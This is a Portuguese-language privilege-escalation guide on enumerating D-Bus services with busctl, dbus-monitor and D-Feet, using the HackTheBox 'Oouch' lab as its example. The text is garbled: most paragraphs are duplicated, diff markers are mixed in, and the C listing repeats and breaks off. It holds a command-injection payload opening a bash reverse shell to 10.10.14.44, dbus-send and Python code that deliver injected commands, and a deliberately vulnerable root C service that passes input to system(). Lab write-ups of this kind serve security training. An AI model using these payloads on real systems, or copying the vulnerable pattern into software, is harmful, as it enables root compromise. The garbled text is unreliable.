Os serviços no D-Bus são definidos pelos **objetos** e **interfaces** que eles expõem. Os objetos podem ser comparados a instâncias de classe em linguagens de programação orientadas a objetos padrão, sendo cada instância identificada de forma única por um **caminho do objeto**. Este caminho, semelhante a um caminho de sistema de arquivos, identifica de forma única cada objeto exposto pelo serviço. Uma interface chave para fins de pesquisa é a interface **org.freedesktop.DBus.Introspectable**, apresentando um método singular, Introspect. Este método retorna uma representação XML dos métodos suportados pelo objeto, sinais e propriedades, com foco aqui nos métodos, omitindo propriedades e sinais.
Cada serviço é definido pelos **objetos** e **interfaces** que ele expõe. Podemos pensar em objetos como instâncias de classes em linguagens OOP padrão. Cada instância única é identificada pelo seu **caminho do objeto** - uma string que se assemelha a um caminho do sistema de arquivos que identifica exclusivamente cada objeto que o serviço expõe. Uma interface padrão que ajudará em nossa pesquisa é a interface **org.freedesktop.DBus.Introspectable**. Ela contém um único método, Introspect, que retorna uma representação XML dos métodos, sinais e propriedades suportados pelo objeto. Esta postagem no blog se concentra em métodos e ignora propriedades e sinais.
Eu usei duas ferramentas para me comunicar com a interface D-Bus: a ferramenta CLI chamada **gdbus**, que permite chamar facilmente métodos expostos pelo D-Bus em scripts, e [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), uma ferramenta GUI baseada em Python que ajuda a enumerar os serviços disponíveis em cada barramento e a ver quais objetos cada serviço contém.
Para a comunicação com a interface D-Bus, foram utilizadas duas ferramentas: uma ferramenta CLI chamada **gdbus** para invocação fácil de métodos expostos pelo D-Bus em scripts, e [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), uma ferramenta GUI baseada em Python projetada para enumerar os serviços disponíveis em cada barramento e exibir os objetos contidos em cada serviço.
```bash
sudo apt-get install d-feet
```
![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png)
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png)
_Figura 1. Janela principal do D-Feet_
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png)
![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png)
_Figura 2. Janela de interface do D-Feet_
Na primeira imagem, são mostrados os serviços registrados com o barramento do sistema D-Bus, com **org.debin.apt** especificamente destacado após selecionar o botão do Barramento do Sistema. O D-Feet consulta este serviço para objetos, exibindo interfaces, métodos, propriedades e sinais para os objetos escolhidos, vistos na segunda imagem. A assinatura de cada método também é detalhada.
No painel esquerdo da Figura 1, você pode ver todos os vários serviços que se registraram com o sistema de barramento do daemon D-Bus (observe o botão Selecionar barramento do sistema na parte superior). Eu selecionei o serviço **org.debin.apt**, e o D-Feet automaticamente **consultou o serviço para todos os objetos disponíveis**. Uma vez que eu selecionei um objeto específico, o conjunto de todas as interfaces, com seus respectivos métodos, propriedades e sinais são listados, como visto na Figura 2. Observe que também obtemos a assinatura de cada **método IPC exposto**.
Um recurso notável é a exibição do **ID do processo (pid)** e da **linha de comando** do serviço, útil para confirmar se o serviço é executado com privilégios elevados, importante para a relevância da pesquisa.
Também podemos ver o **pid do processo** que hospeda cada serviço, bem como sua **linha de comando**. Este é um recurso muito útil, pois podemos validar que o serviço alvo que estamos inspecionando realmente é executado com privilégios mais elevados. Alguns serviços no barramento do sistema não são executados como root e, portanto, são menos interessantes para pesquisar.
**O D-Feet também permite a invocação de métodos**: os usuários podem inserir expressões em Python como parâmetros, que o D-Feet converte em tipos D-Bus antes de passar para o serviço.
O D-Feet também permite chamar os vários métodos. Na tela de entrada do método, podemos especificar uma lista de expressões Python, delimitadas por vírgulas, para serem interpretadas como os parâmetros da função invocada, mostrada na Figura 3. Os tipos Python são agrupados em tipos D-Bus e passados para o serviço.
No entanto, observe que **alguns métodos exigem autenticação** antes de nos permitir invocá-los. Vamos ignorar esses métodos, já que nosso objetivo é elevar nossos privilégios sem credenciais em primeiro lugar.
![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-23.png)
Também observe que alguns dos serviços consultam outro serviço D-Bus chamado org.freedeskto.PolicyKit1 para saber se um usuário deve ser autorizado a realizar certas ações ou não.
_Figura 3. Chamando métodos D-Bus através do D-Feet_
## **Enumeração de Linha de Comando**
Alguns métodos exigem autenticação antes de nos permitir invocá-los. Vamos ignorar esses métodos, já que nosso objetivo é elevar nossos privilégios sem credenciais em primeiro lugar.
![](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-24.png)
_Figura 4. Um método que requer autorização_
Observe também que alguns dos serviços consultam outro serviço D-Bus chamado org.freedeskto.PolicyKit1 se um usuário deve ou não ser autorizado a realizar determinadas ações.
## **Enumeração de linha de comando**
### Listar objetos de serviço
### Listar Objetos de Serviço
É possível listar as interfaces D-Bus abertas com:
```bash
busctl list #List D-Bus interfaces
NAME PID PROCESS USER CONNECTION UNIT SE
:1.0 1 systemd root :1.0 init.scope -
:1.0 1 systemd root :1.0 init.scope -
:1.1345 12817 busctl qtc :1.1345 session-729.scope 72
:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service -
:1.3 2609 dbus-server root :1.3 dbus-server.service -
:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service -
:1.6 2612 systemd-logind root :1.6 systemd-logind.service -
:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… -
:1.820 6583 systemd qtc :1.820 user@1000.service -
com.ubuntu.SoftwareProperties - - - (activatable) - -
fi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service -
fi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service -
htb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service -
org.bluez - - - (activatable) - -
org.freedesktop.DBus 1 systemd root - init.scope -
org.freedesktop.PackageKit - - - (activatable) - -
org.freedesktop.PolicyKit1 - - - (activatable) - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
:1.2 1576 systemd-timesyn systemd-timesync :1.2 systemd-timesyncd.service -
:1.3 2609 dbus-server root :1.3 dbus-server.service -
:1.4 2606 wpa_supplicant root :1.4 wpa_supplicant.service -
:1.6 2612 systemd-logind root :1.6 systemd-logind.service -
:1.8 3087 unattended-upgr root :1.8 unattended-upgrades.serv… -
:1.820 6583 systemd qtc :1.820 user@1000.service -
com.ubuntu.SoftwareProperties - - - (activatable) - -
fi.epitest.hostap.WPASupplicant 2606 wpa_supplicant root :1.4 wpa_supplicant.service -
fi.w1.wpa_supplicant1 2606 wpa_supplicant root :1.4 wpa_supplicant.service -
htb.oouch.Block 2609 dbus-server root :1.3 dbus-server.service -
org.bluez - - - (activatable) - -
org.freedesktop.DBus 1 systemd root - init.scope -
org.freedesktop.PackageKit - - - (activatable) - -
org.freedesktop.PolicyKit1 - - - (activatable) - -
org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - -
```
#### Conexões
Quando um processo estabelece uma conexão com um barramento, o barramento atribui à conexão um nome especial de barramento chamado _unique connection name_. Nomes de barramento desse tipo são imutáveis - é garantido que eles não mudarão enquanto a conexão existir - e, mais importante, eles não podem ser reutilizados durante a vida útil do barramento. Isso significa que nenhuma outra conexão com esse barramento terá um nome de conexão exclusivo atribuído, mesmo que o mesmo processo feche a conexão com o barramento e crie uma nova. Nomes de conexão exclusivos são facilmente reconhecíveis porque começam com o caractere de dois pontos - que é proibido de outra forma.
[Da Wikipedia:](https://en.wikipedia.org/wiki/D-Bus) Quando um processo estabelece uma conexão com um barramento, o barramento atribui à conexão um nome especial de barramento chamado _nome de conexão único_. Nomes de barramento desse tipo são imutáveis — é garantido que não mudarão enquanto a conexão existir — e, mais importante, não podem ser reutilizados durante a vida útil do barramento. Isso significa que nenhuma outra conexão com esse barramento terá atribuído um nome de conexão único, mesmo que o mesmo processo feche a conexão com o barramento e crie uma nova. Nomes de conexão únicos são facilmente reconhecíveis porque começam com o caractere de dois pontos — caso contrário proibido.
### Informações do Objeto de Serviço
Em seguida, você pode obter algumas informações sobre a interface com:
```bash
busctl status htb.oouch.Block #Get info of "htb.oouch.Block" interface
@ -110,37 +101,37 @@ Session=n/a
AuditLoginUID=n/a
AuditSessionID=n/a
UniqueName=:1.3
EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
EffectiveCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
PermittedCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
InheritableCapabilities=
BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
BoundingCapabilities=cap_chown cap_dac_override cap_dac_read_search
cap_fowner cap_fsetid cap_kill cap_setgid
cap_setuid cap_setpcap cap_linux_immutable cap_net_bind_service
cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot
cap_sys_ptrace cap_sys_pacct cap_sys_admin cap_sys_boot
cap_sys_nice cap_sys_resource cap_sys_time cap_sys_tty_config
cap_mknod cap_lease cap_audit_write cap_audit_control
cap_setfcap cap_mac_override cap_mac_admin cap_syslog
cap_wake_alarm cap_block_suspend cap_audit_read
```
### Listar Interfaces de um Objeto de Serviço
@ -149,12 +140,12 @@ Você precisa ter permissões suficientes.
busctl tree htb.oouch.Block #Get Interfaces of the service object
└─/htb
└─/htb/oouch
└─/htb/oouch/Block
└─/htb/oouch
└─/htb/oouch/Block
```
### Interface de Introspecção de um Objeto de Serviço
### Introspecionar Interface de um Objeto de Serviço
Observe como neste exemplo foi selecionada a última interface descoberta usando o parâmetro `tree` (_veja a seção anterior_):
Observe como neste exemplo foi selecionada a última interface descoberta usando o parâmetro `tree` (_ver seção anterior_):
```bash
busctl introspect htb.oouch.Block /htb/oouch/Block #Get methods of the interface
@ -172,16 +163,16 @@ org.freedesktop.DBus.Properties interface - - -
.Set method ssv - -
.PropertiesChanged signal sa{sv}as - -
```
Observe o método `.Block` da interface `htb.oouch.Block` (o que nos interessa). O "s" das outras colunas pode significar que ele espera uma string.
Observe o método `.Block` da interface `htb.oouch.Block` (a que estamos interessados). O "s" das outras colunas pode significar que está esperando uma string.
### Interface de Monitoramento/Captura
Com privilégios suficientes (apenas `send_destination` e `receive_sender` não são suficientes), você pode **monitorar uma comunicação D-Bus**.
Com privilégios suficientes (apenas os privilégios `send_destination` e `receive_sender` não são suficientes) você pode **monitorar uma comunicação D-Bus**.
Para **monitorar** uma **comunicação**, você precisará ser **root**. Se ainda tiver problemas para ser root, verifique [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) e [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
Para **monitorar** uma **comunicação** você precisará ser **root**. Se ainda tiver problemas para ser root, verifique [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) e [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
{% hint style="warning" %}
Se você souber como configurar um arquivo de configuração do D-Bus para **permitir que usuários não root capturem** a comunicação, por favor, **entre em contato comigo**!
Se você souber como configurar um arquivo de configuração do D-Bus para **permitir que usuários não root espiem** a comunicação, por favor, **entre em contato comigo**!
{% endhint %}
Diferentes maneiras de monitorar:
@ -190,34 +181,34 @@ sudo busctl monitor htb.oouch.Block #Monitor only specified
sudo busctl monitor #System level, even if this works you will only see messages you have permissions to see
sudo dbus-monitor --system #System level, even if this works you will only see messages you have permissions to see
```
No exemplo a seguir, a interface `htb.oouch.Block` é monitorada e **a mensagem "**_**lalalalal**_**" é enviada através de uma má comunicação**:
No exemplo a seguir, a interface `htb.oouch.Block` é monitorada e **a mensagem "**_**lalalalal**_**" é enviada por meio de uma má comunicação**:
```bash
busctl monitor htb.oouch.Block
Monitoring bus message stream.
‣ Type=method_call Endian=l Flags=0 Version=1 Priority=0 Cookie=2
Sender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block
UniqueName=:1.1376
MESSAGE "s" {
STRING "lalalalal";
};
Sender=:1.1376 Destination=htb.oouch.Block Path=/htb/oouch/Block Interface=htb.oouch.Block Member=Block
UniqueName=:1.1376
MESSAGE "s" {
STRING "lalalalal";
};
‣ Type=method_return Endian=l Flags=1 Version=1 Priority=0 Cookie=16 ReplyCookie=2
Sender=:1.3 Destination=:1.1376
UniqueName=:1.3
MESSAGE "s" {
STRING "Carried out :D";
};
Sender=:1.3 Destination=:1.1376
UniqueName=:1.3
MESSAGE "s" {
STRING "Carried out :D";
};
```
Você pode usar `capture` em vez de `monitor` para salvar os resultados em um arquivo pcap.
Pode usar `capture` em vez de `monitor` para salvar os resultados em um arquivo pcap.
#### Filtrando todo o ruído <a href="#filtering_all_the_noise" id="filtering_all_the_noise"></a>
Se houver muita informação no barramento, passe uma regra de correspondência assim:
Se houver muita informação no barramento, passe uma regra de correspondência da seguinte forma:
```bash
dbus-monitor "type=signal,sender='org.gnome.TypingMonitor',interface='org.gnome.TypingMonitor'"
```
Várias regras podem ser especificadas. Se uma mensagem corresponder a _qualquer_ uma das regras, a mensagem será impressa. Como segue:
Múltiplas regras podem ser especificadas. Se uma mensagem corresponder a _qualquer_ das regras, a mensagem será impressa. Como abaixo:
```bash
dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
```
@ -225,7 +216,7 @@ dbus-monitor "type=error" "sender=org.freedesktop.SystemToolsBackends"
```bash
dbus-monitor "type=method_call" "type=method_return" "type=error"
```
Veja a [documentação do D-Bus](http://dbus.freedesktop.org/doc/dbus-specification.html) para mais informações sobre a sintaxe de regras de correspondência.
Consulte a [documentação do D-Bus](http://dbus.freedesktop.org/doc/dbus-specification.html) para obter mais informações sobre a sintaxe da regra de correspondência.
### Mais
@ -233,65 +224,65 @@ Veja a [documentação do D-Bus](http://dbus.freedesktop.org/doc/dbus-specificat
## **Cenário Vulnerável**
Como usuário **qtc dentro do host "oouch" do HTB**, você pode encontrar um **arquivo de configuração inesperado do D-Bus** localizado em _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
```markup
Como usuário **qtc dentro do host "oouch" do HTB**, você pode encontrar um **arquivo de configuração D-Bus inesperado** localizado em _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
```xml
<?xml version="1.0" encoding="UTF-8"?> <!-- -*- XML -*- -->
<!DOCTYPE busconfig PUBLIC
"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>
<policy user="root">
<allow own="htb.oouch.Block"/>
</policy>
<policy user="root">
<allow own="htb.oouch.Block"/>
</policy>
<policy user="www-data">
<allow send_destination="htb.oouch.Block"/>
<allow receive_sender="htb.oouch.Block"/>
</policy>
<policy user="www-data">
<allow send_destination="htb.oouch.Block"/>
<allow receive_sender="htb.oouch.Block"/>
</policy>
</busconfig>
```
Observação da configuração anterior: **você precisará ser o usuário `root` ou `www-data` para enviar e receber informações** por meio dessa comunicação D-BUS.
Observe da configuração anterior que **você precisará ser o usuário `root` ou `www-data` para enviar e receber informações** por meio dessa comunicação D-BUS.
Como usuário **qtc** dentro do contêiner docker **aeb4525789d8**, você pode encontrar algum código relacionado ao dbus no arquivo _/code/oouch/routes.py._ Este é o código interessante:
```python
if primitive_xss.search(form.textfield.data):
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
bus = dbus.SystemBus()
block_object = bus.get_object('htb.oouch.Block', '/htb/oouch/Block')
block_iface = dbus.Interface(block_object, dbus_interface='htb.oouch.Block')
client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr)
response = block_iface.Block(client_ip)
bus.close()
return render_template('hacker.html', title='Hacker')
client_ip = request.environ.get('REMOTE_ADDR', request.remote_addr)
response = block_iface.Block(client_ip)
bus.close()
return render_template('hacker.html', title='Hacker')
```
Como você pode ver, está **conectando a uma interface D-Bus** e enviando para a função **"Block"** o "client\_ip".
Como pode ver, está **conectando a uma interface D-Bus** e enviando para a função **"Block"** o "client\_ip".
Do outro lado da conexão D-Bus, há um binário compilado em C em execução. Este código está **ouvindo** na conexão D-Bus **por endereço IP e está chamando o iptables via função `system`** para bloquear o endereço IP fornecido.\
**A chamada ao `system` é vulnerável de propósito à injeção de comando**, então uma carga útil como a seguinte criará um shell reverso: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
Do outro lado da conexão D-Bus, há um binário compilado em C em execução. Este código está **ouvindo** a conexão D-Bus **para o endereço IP e está chamando o iptables via função `system`** para bloquear o endereço IP fornecido.\
**A chamada para `system` é vulnerável de propósito à injeção de comandos**, então um payload como o seguinte criará um shell reverso: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
### Explorando
### Explorar
No final desta página, você pode encontrar o **código C completo do aplicativo D-Bus**. Dentro dele, você pode encontrar entre as linhas 91-97 **como o `caminho do objeto D-Bus`** e o **`nome da interface`** são **registrados**. Essas informações serão necessárias para enviar informações para a conexão D-Bus:
No final desta página, você pode encontrar o **código C completo da aplicação D-Bus**. Dentro dele, entre as linhas 91-97, você pode ver como o **`caminho do objeto D-Bus`** e o **`nome da interface`** são **registrados**. Essas informações serão necessárias para enviar informações para a conexão D-Bus:
```c
/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block", /* interface */
"htb.oouch.Block", /* service object */
block_vtable,
NULL);
/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block", /* interface */
"htb.oouch.Block", /* service object */
block_vtable,
NULL);
```
Além disso, na linha 57 você pode encontrar que **o único método registrado** para esta comunicação D-Bus é chamado de `Block` (_**Por isso, na seção seguinte, os payloads serão enviados para o objeto de serviço `htb.oouch.Block`, a interface `/htb/oouch/Block` e o nome do método `Block`**_):
Também, na linha 57, você pode encontrar que **o único método registrado** para esta comunicação D-Bus é chamado `Block`(_**Por isso, na próxima seção, os payloads serão enviados para o objeto de serviço `htb.oouch.Block`, a interface `/htb/oouch/Block` e o nome do método `Block`**_):
```c
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
```
#### Python
O seguinte código em python enviará o payload para a conexão D-Bus para o método `Block` via `block_iface.Block(runme)` (_note que foi extraído do trecho de código anterior_):
O seguinte código Python enviará a carga útil para a conexão D-Bus para o método `Block` via `block_iface.Block(runme)` (_observe que foi extraído do trecho de código anterior_):
```python
import dbus
bus = dbus.SystemBus()
@ -302,27 +293,21 @@ response = block_iface.Block(runme)
bus.close()
```
#### busctl e dbus-send
O `busctl` e o `dbus-send` são ferramentas de linha de comando que permitem interagir com o sistema de comunicação D-Bus. O D-Bus é um sistema de comunicação entre processos que permite que aplicativos se comuniquem entre si e com o sistema operacional.
Essas ferramentas podem ser usadas para enumerar serviços D-Bus disponíveis no sistema e enviar mensagens para esses serviços. Isso pode ser útil para a escalada de privilégios, pois alguns serviços D-Bus podem ser configurados para executar com privilégios elevados.
Por exemplo, se um serviço D-Bus estiver configurado para executar com privilégios elevados e permitir a execução de comandos arbitrários, um invasor pode enviar uma mensagem para esse serviço contendo um comando malicioso e executá-lo com privilégios elevados.
```bash
dbus-send --system --print-reply --dest=htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block string:';pring -c 1 10.10.14.44 #'
```
* `dbus-send` é uma ferramenta usada para enviar mensagens para o "Message Bus"
* Message Bus - Um software usado pelos sistemas para facilitar a comunicação entre aplicativos. Está relacionado à Message Queue (as mensagens são ordenadas em sequência), mas no Message Bus as mensagens são enviadas em um modelo de assinatura e também muito rapidamente.
* `dbus-send` é uma ferramenta usada para enviar mensagens para o "Message Bus".
* Message Bus - Um software usado por sistemas para facilitar a comunicação entre aplicativos. Está relacionado com a Fila de Mensagens (as mensagens são ordenadas em sequência), mas no Message Bus as mensagens são enviadas em um modelo de assinatura e também são muito rápidas.
* A tag "-system" é usada para mencionar que é uma mensagem do sistema, não uma mensagem de sessão (por padrão).
* A tag "--print-reply" é usada para imprimir nossa mensagem adequadamente e receber quaisquer respostas em um formato legível por humanos.
* "--dest=Dbus-Interface-Block" é o endereço da interface Dbus.
* "--string:" - Tipo de mensagem que gostaríamos de enviar para a interface. Existem vários formatos de envio de mensagens, como double, bytes, booleans, int, objpath. Dentre esses, o "objpath" é útil quando queremos enviar um caminho de arquivo para a interface Dbus. Podemos usar um arquivo especial (FIFO) nesse caso para passar um comando para a interface com o nome de um arquivo. "string: ;" - Isso é para chamar o caminho do objeto novamente, onde colocamos o arquivo de shell reverso FIFO / comando.
* A tag "--print-reply" é usada para imprimir nossa mensagem adequadamente e receber quaisquer respostas em um formato legível para humanos.
* "--dest=Dbus-Interface-Block" - O endereço da interface Dbus.
* "--string:" - Tipo de mensagem que gostaríamos de enviar para a interface. Existem vários formatos para enviar mensagens como double, bytes, booleans, int, objpath. Dentre esses, o "objeto de caminho" é útil quando queremos enviar o caminho de um arquivo para a interface Dbus. Podemos usar um arquivo especial (FIFO) nesse caso para passar um comando para a interface com o nome de um arquivo. "string:;" - Isso é para chamar o caminho do objeto novamente onde colocamos o arquivo de shell reverso FIFO.
Observe que em `htb.oouch.Block.Block`, a primeira parte (`htb.oouch.Block`) se refere ao objeto de serviço e a última parte (`.Block`) se refere ao nome do método.
_Obs: Em `htb.oouch.Block.Block`, a primeira parte (`htb.oouch.Block`) faz referência ao objeto de serviço e a última parte (`.Block`) faz referência ao nome do método._
### Código C
{% code title = "d-bus_server.c" %}
{% code title="d-bus_server.c" %}
```c
//sudo apt install pkgconf
//sudo apt install libsystemd-dev
@ -336,143 +321,148 @@ Observe que em `htb.oouch.Block.Block`, a primeira parte (`htb.oouch.Block`) se
#include <systemd/sd-bus.h>
static int method_block(sd_bus_message *m, void *userdata, sd_bus_error *ret_error) {
char* host = NULL;
int r;
char* host = NULL;
int r;
/* Read the parameters */
r = sd_bus_message_read(m, "s", &host);
if (r < 0) {
fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r));
return r;
}
/* Read the parameters */
r = sd_bus_message_read(m, "s", &host);
if (r < 0) {
fprintf(stderr, "Failed to obtain hostname: %s\n", strerror(-r));
return r;
}
char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP";
char command[] = "iptables -A PREROUTING -s %s -t mangle -j DROP";
int command_len = strlen(command);
int host_len = strlen(host);
int command_len = strlen(command);
int host_len = strlen(host);
char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char));
if(command_buffer == NULL) {
fprintf(stderr, "Failed to allocate memory\n");
return -1;
}
char* command_buffer = (char *)malloc((host_len + command_len) * sizeof(char));
if(command_buffer == NULL) {
fprintf(stderr, "Failed to allocate memory\n");
return -1;
}
sprintf(command_buffer, command, host);
sprintf(command_buffer, command, host);
/* In the first implementation, we simply ran command using system(), since the expected DBus
* to be threading automatically. However, DBus does not thread and the application will hang
* forever if some user spawns a shell. Thefore we need to fork (easier than implementing real
* multithreading)
*/
int pid = fork();
/* In the first implementation, we simply ran command using system(), since the expected DBus
* to be threading automatically. However, DBus does not thread and the application will hang
* forever if some user spawns a shell. Thefore we need to fork (easier than implementing real
* multithreading)
*/
int pid = fork();
if ( pid == 0 ) {
/* Here we are in the child process. We execute the command and eventually exit. */
system(command_buffer);
exit(0);
} else {
/* Here we are in the parent process or an error occured. We simply send a genric message.
* In the first implementation we returned separate error messages for success or failure.
* However, now we cannot wait for results of the system call. Therefore we simply return
* a generic. */
return sd_bus_reply_method_return(m, "s", "Carried out :D");
}
r = system(command_buffer);
if ( pid == 0 ) {
/* Here we are in the child process. We execute the command and eventually exit. */
system(command_buffer);
exit(0);
} else {
/* Here we are in the parent process or an error occured. We simply send a genric message.
* In the first implementation we returned separate error messages for success or failure.
* However, now we cannot wait for results of the system call. Therefore we simply return
* a generic. */
return sd_bus_reply_method_return(m, "s", "Carried out :D");
}
r = system(command_buffer);
}
/* The vtable of our little object, implements the net.poettering.Calculator interface */
static const sd_bus_vtable block_vtable[] = {
SD_BUS_VTABLE_START(0),
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
SD_BUS_VTABLE_END
SD_BUS_VTABLE_START(0),
SD_BUS_METHOD("Block", "s", "s", method_block, SD_BUS_VTABLE_UNPRIVILEGED),
SD_BUS_VTABLE_END
};
int main(int argc, char *argv[]) {
/*
* Main method, registeres the htb.oouch.Block service on the system dbus.
*
* Paramaters:
* argc (int) Number of arguments, not required
* argv[] (char**) Argument array, not required
*
* Returns:
* Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive
* as long as the user keeps it alive.
*/
/*
* Main method, registeres the htb.oouch.Block service on the system dbus.
*
* Paramaters:
* argc (int) Number of arguments, not required
* argv[] (char**) Argument array, not required
*
* Returns:
* Either EXIT_SUCCESS ot EXIT_FAILURE. Howeverm ideally it stays alive
* as long as the user keeps it alive.
*/
/* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */
signal(SIGCHLD,SIG_IGN);
/* To prevent a huge numer of defunc process inside the tasklist, we simply ignore client signals */
signal(SIGCHLD,SIG_IGN);
sd_bus_slot *slot = NULL;
sd_bus *bus = NULL;
int r;
sd_bus_slot *slot = NULL;
sd_bus *bus = NULL;
int r;
/* First we need to connect to the system bus. */
r = sd_bus_open_system(&bus);
if (r < 0)
{
fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r));
goto finish;
}
/* First we need to connect to the system bus. */
r = sd_bus_open_system(&bus);
if (r < 0)
{
fprintf(stderr, "Failed to connect to system bus: %s\n", strerror(-r));
goto finish;
}
/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block", /* interface */
"htb.oouch.Block", /* service object */
block_vtable,
NULL);
if (r < 0) {
fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r));
goto finish;
}
/* Install the object */
r = sd_bus_add_object_vtable(bus,
&slot,
"/htb/oouch/Block", /* interface */
"htb.oouch.Block", /* service object */
block_vtable,
NULL);
if (r < 0) {
fprintf(stderr, "Failed to install htb.oouch.Block: %s\n", strerror(-r));
goto finish;
}
/* Register the service name to find out object */
r = sd_bus_request_name(bus, "htb.oouch.Block", 0);
if (r < 0) {
fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r));
goto finish;
}
/* Register the service name to find out object */
r = sd_bus_request_name(bus, "htb.oouch.Block", 0);
if (r < 0) {
fprintf(stderr, "Failed to acquire service name: %s\n", strerror(-r));
goto finish;
}
